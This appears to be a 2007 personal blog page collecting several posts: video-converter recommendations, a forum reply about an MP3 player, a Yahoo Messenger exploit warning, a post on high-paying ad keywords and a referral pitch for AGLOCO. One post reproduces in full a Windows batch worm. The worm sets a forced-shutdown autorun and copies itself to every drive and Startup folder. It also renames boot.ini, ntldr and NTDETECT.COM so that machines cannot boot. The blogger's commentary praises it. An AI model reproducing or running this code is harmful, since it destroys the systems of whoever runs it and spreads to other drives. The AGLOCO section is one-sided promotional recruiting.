Noteable Posts

Sunday, September 16, 2007

How to Convert 3gp/flv Videos to other Formats

Nowadays the cameras bundled with mobile phones are improving day by day and we already have 5MP cams. :smile: Most of the handsets captures videos as 3GP formats and also when we want to play other videos in mobile phones, it becomes difficult as it accepts only 3GP or MP4 formats (although some of the models also accept mpeg formats). Now the question is how to convert 3GP to other formats and vice versa.There are lot of converters available for this, but most of them are not freewares and many of them lose the clarity while converting.

SUPER © is a software that supports a wide variety of input/source file format to play or encode (to & from) without any additional third party software.

If you need a simple, yet very efficient tool to convert (encode) or play any Multimedia file, without reading manuals or spending long hours training, then SUPER © is all you need. It is a Multimedia Encoder and a Multimedia Player, easy-to-use with 1 simple click.

 

Super1

Supported input source file formats are:

- Video format: 3gp/3g2 (Nokia, Siemens, Sony Ericsson) asf, avi (DivX, H263, H263+, H264, XviD, MPEG4, MSmpeg4), dat, fli, flc, flv (used in Flash), mkv, mpg (Mpeg I,Mpeg II), mov (H263, H263+, H264, MPEG4), mp4 (H263, H263+, H264, MPEG4), ogg, qt, rm, ram, rmvb, str (Play Station), swf (Flash), ts (HDTV), viv, vob, wmv
- Audio format: aac, ac3, amr, mmf, mp2, mp3, mp4, mpc, ogg, ra, wav, wma.

As you can see from the list, it supports a wide range of formats. Converting the file is also very easy. All you have to do is to drag and drop the file into the area and select the type of conversion required. Then select the video and audio properties needed and click convert. Thats it, the file is converted into the desired format without any loss of clarity.

Here are some useful tips;

  • Video scale size, aspect ratio and frames per second are important things to note while converting.
  • If you intent to convert files to 3GP format for Sony Ericsson phones, select 176 X 144 scale size, aspect ratio as 1:1 and frames per second as 15.
  • You can convert files with any duration and size. (No restrictions)
  • Super supports conversion (encoding both ways, to and from) for all listed formats.

I have converted complete movies (1.5 GB size) from Mpeg to 3GP formats for playing it in my W700i without losing any clarity of the original video. I recommend this software for all those convert videos to 3GP and vice versa for use in mobile phones. :smile:

Here is another quote from SUPER regarding this software;


SUPER © is 100% FREE to download and to use. Any attempt to sell SUPER © such as on eBay, is THEFT. Violators will be prosecuted to the full extent of the law. SUPER © is a FREEWARE that cannot be sold under any circumstances.

Current version of SUPER © : v2007.build.22 (March 14, 2007). If you need any help in converting the files, do leave a comment.

The latest version can be downloaded from here. FAQs and detailed demonstration available here .

Sunday, August 26, 2007

Anatomy of an worm written with plain windows batch commands

On 8/26/07, Shezan <shezan2k7@gmail.com> wrote:
Yes I created it with Notepad. I actually created a MS-DOS .bat file using notepad and then converted the shezan.bat file to .exe using using a bat2exe software.. Its nothing . kono bhabe jora tali die baniechhi... Check the source code.....
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! I used to do this long ago lol ... But dont work with .bat files since 1999
And good that you've found a great security hole windows has. Its a security hole because Windows lets the program change certain settings without making precautions. Have you tested the renaming part of this?
Now listen.. its nothing near to virus. Its just a malware. Virus needs lots of capability to be called as a virus. Replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can though be called as an worm. U used sub7's icon with your .exe file thats why I thought its sub7's variant.
12-16 is your Birthday?
Enough with Batch coding now learn real programming with C++, C#, Java etc.
Antiviruses detect it as those test in heuristic mode...

Problem in mp3 player

On 25 Aug 2007 19:54:37 -0000, Zaman <visit****@rediffmail.com> wrote:
hi,
I'm facing problem with my mp3 player....
it's working well when I connect it to my computer through USB port....
but when I click on safely remove hardware on task bar to disconnect it from pc the computer show me message
that "prblem ejecting mass storage device", "The device generic volume cannot be stopped right now.
Try stopping the device again later".
what should I do?
Thank you.

Your PC might be infected with a virus which tries to access the removable device when u are not. May be thats why its giving that error. Before ejecting make sure u closed all windows which opened any media from your MP3 player. And also check with antivirus if you cant get rid of the problem. If the device is bz it wont release, remember that.
Thanks

Tuesday, August 21, 2007

Convert Flash Video .flv Files to .mpg or .avi and Other Media Formats

With some tricks, it's now possible to download the videos that hosted and shared on online video sites such as YouTube and Google Video, instead of just watching the video embedded on the websites.

Some video files that are downloaded from these online video hosting sites may be in the format of Flash Video (.flv). For whatever reasons, such as prefer to view and store the videos in mpeg format, or want to play the offline video clips in portable player such as PSP and iPod, or simply don't like to view it with FLV Player, then there is a need to convert the .flv video format to another format such as .avi, .mov, .wmv and .mpg. There are several tools and conversion utilities that can be used to do the media format conversion.

Riva FLV Encoder

Able to decode Flash Video into AVI, MPEG, Quicktime and WMV. The utility is capable to do the encoding into Flash Video too, and comes with a FLV Player. The conversion may have issue of audio codec cannot be transcoded. For solution and conversion tutorial, visit VideoHelp.

Total Video Converter

A total solution to video conversion which supports reading, playing lots of video and audio formats and converting them to popular video formats. Supported source/input file formats include:

Video Formats:

  • Rmvb(.rm,.rmvb)
  • MPEG4(.mp4)
  • 3gp(.3gp, 3g2)
  • Game Psp(.psp)
  • MPEG1(.mpg, mpeg)
  • MPEG2 PS (.mpg, mpeg, vob)
  • MPEG2 TS (DVB Transport Stream)
  • Ms ASF(.asf, .wmv)
  • Ms AVI(.avi)
  • Macromedia Flash video FLV (.flv)
  • Real Video (rm)
  • Apple Quicktime(.mov)
  • FLIC format(.fli, .flc)
  • Gif Animation(.gif)
  • DV (.dv)
  • Video Formats Dx9 Directshow can open

Audio Formats:

  • CD audio(.cda)
  • MPEG audio(.mp3, mp2)
  • Ms WAV(.wav)
  • Ms WMA(.wma)
  • Real Audio (.ra)
  • OGG(.ogg)
  • Amr audio(.amr)
  • AC3(.ac3)
  • SUN AU format (.au)
  • Macromedia Flash embedded audio(.swf)
  • Audio Formats Dx9 Directshow can open

Game Video Formats:

  • Technologies format, used in some games(.4xm)
  • Playstation STR
  • Id RoQ used in Quake III, Jedi Knight 2, other computer games
  • format used in various Interplay computer games, Interplay MVE
  • multimedia format used in Origin's Wing Commander III computer game,WC3 Movie
  • used in many Sega Saturn console games, Sega FILM/CPK
  • Multimedia formats used in Westwood Studios games, Westwood Studios VQA/AUD
  • Used in Quake II, Id Cinematic (.cin)
  • used in Sierra CD-ROM games, Sierra VMD
  • used in Sierra Online games, .sol files
  • Electronic Arts Multimedia, Matroska
  • used in various EA games; files have extensions like WVE and UV2
  • Nullsoft Video (NSV) format

And Total Video Converter able to convert any of the file formats above to the following video media formats, including of mobile videos or audios (mp4, 3gp, xvid, divx mpeg4 avi, amr audio) which are used by cellphone, PDA, PSP, iPod:

Video Formats:

  • MPEG4(.mp4)
  • 3gp(.3gp, 3g2)
  • Game Psp(.psp)
  • MPEG1(.mpg, mpeg)
  • NTSC, PAL DVD mpeg
  • NTSC, PAL SVCD mpeg
  • NTSC, PAL VCD mpeg
  • Ms Mpeg4 AVI(.avi)
  • Divx AVI(.avi)
  • Xvid AVI(.avi)
  • H264 AVI(.avi)
  • Mjpeg AVI(.avi)
  • HuffYUV AVI(.avi)
  • Swf Video(.swf)
  • Flv Video (.flv)
  • Gif Animation(.gif)
  • Mpeg4 Mov(.mov)
  • Apple Quicktime(.mov)
  • FLIC format(.fli, .flc)
  • Gif Animation(.gif)
  • DV (.dv)

Audio Formats:

  • MPEG audio(.mp3, mp2)
  • Ms WAV(.wav)
  • Ms WMA(.wma)
  • OGG(.ogg)
  • Amr audio(.amr)
  • AC3(.ac3)
  • SUN AU format (.au)
  • m4a(mp4 audio)

SUPER - Simplified Universal Player Encoder & Renderer

SUPER supports a wide variety of input/source file format to play or encode and decode without any additional third party software. It's a GUI to ffmpeg, mencoder, mplayer, ffmpeg2theora & the theora/vorbis RealProducer plugIn. SUPER is a simple yet very efficient tool to convert (encode) or play any Multimedia file, and most video formats and also portable formats for PSP, iPod, PocketPC and NEC, Nokia, Siemens, SonyEricsson are supported.

FLV Online Converter

A free online FLV converter that grab the video from Youtube from embedded web page and convert it on the fly and let you download the properly converted video.

Media Convert

A universal media and file format converter which also able to convert FLV flash video format to another video format.

VDownloader or Web Video Downloader

A free utility that download flash video from Youtube, Google Video, Grinvi and DailyMotion, and then automatically convert the flash video (FLV) to supported video format such as AVI, MPEG (MPG) and PSP video files. One stone kill 2 birds application if you plan to download your flash video from online video sharing and hosting sites.

MPlayer's MEncoder

MEncoder is an all-purpose encoder that is part of MPlayer, a movie player which runs on many systems. It plays most MPEG/VOB, AVI, Ogg/OGM, VIVO, ASF/WMA/WMV, QT/MOV/MP4, RealMedia, Matroska, NUT, NuppelVideo, FLI, YUV4MPEG, FILM, RoQ, PVA files, supported by many native, XAnim, and Win32 DLL codecs. MEncoder is command-line based with limited GUI. It supports wide range of file formats as MPlayer, and it also enable format conversion to be done in x86, Unix, Linux, Red Hat, Mac OS X and other non-x86 system.

Example of command line MEncode syntax:

mencoder input.flv -ofps 15 -vf scale=300:-2 -oac lavc -ovc lavc -lavcopts vcodec=msmpeg4v2:acodec=mp3:abitrate=64 -o output.avi

Replace input.flv and output.avi to your desired file name.

iSquant

iSquint is an iPod video conversion application for Mac OS X. It will convert most popular video formats, including .flv into .mp4 format.

PSP Video 9

PSP Video 9 is a free PSP video conversion and management application. It can convert regular PC video files (avi, mpeg, flv etc) into PSP video files that can plays in PSP portable player, as well as manage/copy these PSP video files between your PC and PSP.

Videora iPod Converter

Videora iPod Converter is a free video conversion application that converts your regular PC video files (avi, mpeg, flv etc) into the proper video format that can plays on your iPod.

Get help or contribute tips or tricks at My Digital Life Forums.

Yahoo Messenger's Webcam invites may cause trouble

There's a new zero-day attack in progress against Yahoo Messenger users. The instant messaging solicitation invites users to open their Webcam. However, the code used in this China-based exploit causes a heap overflow to be triggered when the target accepts a Webcam invitation. That means a remote attacker could execute malicious code on a compromised machine.

The McAfee security blog recommends the following: do not accept Webcam invites from untrusted sources until a patch is released, and block outgoing traffic on TCP port 5100 on your firewall until a patch is released.

Yahoo has been informed and says it is working on a patch.

Monday, July 23, 2007

They Most paying keywords

Do you know which are the buzzwords/keywords everyone is talking about nowadays?
Or are you just gonna ask what are keywords? or buzzwords?
Okay, let me explain. Keywords are just words which applies to specific matters as reserved or usable words. Lets say 'legal' can be a keyword while talking about law things. And buzzwords are also words but they are most discussed words or most used words.
You might also wonder why people will be crazy about some words? Are they some kind of jerks? or geeks? or scrabble players?
Well, in most cases they are not! Then why people are after words? lol
You are not the only one to be ignorant like this but dont be for too long.
Its the latest internet trend that people, even people around you have become interested about making money online. And others, spending lots of bucks to spread their new ideas, products, sites to the hugely growing internet users all over the world. These both group needs those valuable keywords. These keywords are words which ppl look for in the internet and advertisers eager to provide or catch customers from them. Now that making your presence is becoming more and more easier through free websites, webcommunities, forums, profile sites, blogs - people trying to use those keywords in funny manners to get quick money from showing ads in their webspaces. Especially through Google Adsense program.
Lets see a very funny description wrote at someone's profile:
i enjoy money and finance, i have a loan for my student fees and my grandad needs a mesothelioma lawyer. I think asbestos cancer is a bad thing and lung cancer can be caused from smoking tobacco. I use affiliate programs to help earn money online. My father is a federal criminal attorney and he specialises in being a car accident lawyer and personal injury claims.
* underlined words are the keywords for which advertisers usually pay high amount to the ad publishers for competetive bidding.
 


 

Saturday, July 7, 2007

AGLOCO :: Pays for your Surfing


 

Today's hottest Internet businesses are all about the power of social networks. Companies like MySpace, Facebook, and YouTube have become worth billions because businesses have realized that these social networks are generating huge advertising and marketing opportunities. As these social networks grow, the economic potential for its owners – and the advertisers who target the site's users – is remarkable.
At AGLOCO, we asked a simple question: The users created the community, where's their share of the profit?
It was from this question that AGLOCO set out to create the Internet's first Economic Network, harnessing the power of Internet-based social networks to directly benefit the Members who help to create the community.
Becoming a member of AGLOCO is as simple as completing a brief sign-up page (name, age, location and email address.). Once you're a Member, you will be asked to then download the Viewbar™ software. (Note: the Viewbar™ software is currently unavailable, as it is in closed testing. It will be ready for public download in a few weeks, and members will be notified when it is available.)
AGLOCO makes money for its Members in many ways:
 
  • Search: Every time you use the Viewbar™ to do an Internet search, AGLOCO earns money from the search engine providers. (For example, Google pays as much as $0.10 on average for each search that is directed to its search engine.)
    Advertising: The Viewbar™ itself displays ads that are targeted based upon the websites you're visiting. When you click on an ad and make a purchase, AGLOCO receives a referral fee, which we pass on to our Members. (Please note: Individual members do not receive any compensation for clicking on ads in the Viewbar™, and the Viewbar™ can detect if someone is clicking ads in a fraudulent manner.)
    Transaction commissions: Many major retailers pay commissions when you refer customers who make a purchase. AGLOCO collects that commission and passes it on to our members. (For example, Amazon pays an 8.5% commission to most websites who refer customers, and has cut deals for even larger percentages. The bigger the AGLOCO community, the better commission we can negotiate for our Members.)
    Software distribution: Numerous software companies pay websites to encourage the download of new software releases (for example, Adobe's Flash and Acrobat Reader software), and trial versions of new programs. AGLOCO members not only get access to the latest and coolest software, they get paid for it.
    Service distribution: Many online service providers will look to the AGLOCO community as a source of new and active users for their services. (For example, eBay, Skype, and PayPal, among others, all pay fees to people who help them recruit new active users to their services)
    Product distribution: When Members agree to use a product, such as cell phones, high-tech gadgets, office supplies, new credit cards or financial services, AGLOCO can collect referral fees. Some companies even offer special rebate and cash-back programs.
AGLOCO Members make money in four ways.
  • Members earn a monthly share of the AGLOCO revenue based on the use of the AGLOCO Viewbar™ that month.
  • Members earn part of the company based on the use of the AGLOCO Viewbar™ that month (currently a maximum of five hours are rewarded).  Click here for details.
  • Members who use our referral system to help build the AGLOCO network will earn more. (AGLOCO only has significant value as a large network and people who help build it should be rewarded. – We also feel that the early users who told friends about YouTube or MySpace or even Google probably deserved something too, but no referral system was available to record their work).
  • Members will also get a share of any commissions AGLOCO gets when a Member purchases a product or service from an AGLOCO Sponsor company.
Why should I join now?
  • First, it costs nothing to Join and takes less than one minute.  

     
  • Second, you can help build the AGLOCO community by recruiting new Members TODAY.

    Right now, inviting your friends to join AGLOCO is as easy and productive as it will ever be – but you need to invite your friends before someone else beats you to them.

    Remember, the bigger the AGLOCO community, the more attractive AGLOCO is to potential business partners and advertisers.

     
    • Recruit your friends and family by contacting them through email. (But remember we have a strict anti-spam policy .)
    • Use your blog and your existing social networks, such as MySpace and Facebook, to contact your friends and encourage them to join a new community that will actually let them earn money.